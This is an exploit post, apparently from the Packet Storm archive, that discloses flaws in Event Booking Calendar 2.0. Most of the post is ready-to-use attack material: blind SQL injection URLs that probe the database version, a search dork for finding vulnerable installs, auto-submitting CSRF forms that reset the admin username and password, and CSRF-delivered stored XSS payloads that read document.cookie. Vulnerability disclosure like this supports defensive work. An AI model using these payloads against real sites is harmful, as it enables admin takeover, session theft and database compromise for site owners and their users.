exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Event Booking Calendar 2.0 CSRF / XSS / SQL Injection

Event Booking Calendar 2.0 CSRF / XSS / SQL Injection
Posted Jan 13, 2014
Authored by HackXBack

Event Booking Calendar version 2.0 suffers from cross site request forgery, remote SQL injection, and cross site scripting vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
SHA-256 | 6e48051ca41d4a5840ce63add66a1bddb3bb21040e2895174b0a34fa26916171

Event Booking Calendar 2.0 CSRF / XSS / SQL Injection

Change Mirror Download
Event Booking Calendar V2.0 - Multiple Vulnerabilties
====================================================================

####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script : www.phpjabbers.com/event-booking-calendar/
.:. Tested On Demo :
http://www.phpjabbers.com/demo/eb_20/index.php?controller=Admin&action=login
.:. Dork : inurl:"load-calendar.php"
####################################################################

===[ Exploit ]===

[1] multiple Blind Ijection
============================

www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1[inject]
www.site.com/script/load-calendar.php?cid=1[inject]

www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1
>>True
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2
>>False

www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5
>>True
www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4
>>False



[2] Cross Site Request Forgery
==============================

[Change Username/Password Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminOptions&action=update">
<input type="hidden" name="options_update" value="1"/>
<input type="hidden" name="tab_id" value="tabs-1"/>
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="password" value="password"/>
</form>

</body>
</html>

[3] Multiple Cross Site Scripting
=================================

# CSRF with XSS Exploit:

I. Xss In Event


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminEvents&action=create">
<input type="hidden" name="event_create" value="1"/>
<input type="hidden" name="category_id" value="2"/>
<input type="hidden" name="event_title"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="event_description" value="12"/>
<input type="hidden" name="event_max_people" value="12"/>
<input type="hidden" name="event_color" value="FFCC00"/>
<input type="hidden" name="start[1]" value="2014-01-11 00:00"/>
<input type="hidden" name="end[1]" value="2014-01-11 00:00"/>
<input type="hidden" name="title[]" value="Regular price"/>
<input type="hidden" name="price[]" value="888"/>
<input type="hidden" name="repeat_every" value=""/>
<input type="hidden" name="repeat_ends" value="2014-01-11"/>
</form>
</body>
</html>

II. Xss In Categories


<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=AdminCategories&action=create">
<input type="hidden" name="category_create" value="1"/>
<input type="hidden" name="category_title"
value="<script>alert(document.cookie);</script>"/>
</form>
</body>
</html>

####################################################################
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    24 Files
  • 26
    Sep 26th
    26 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close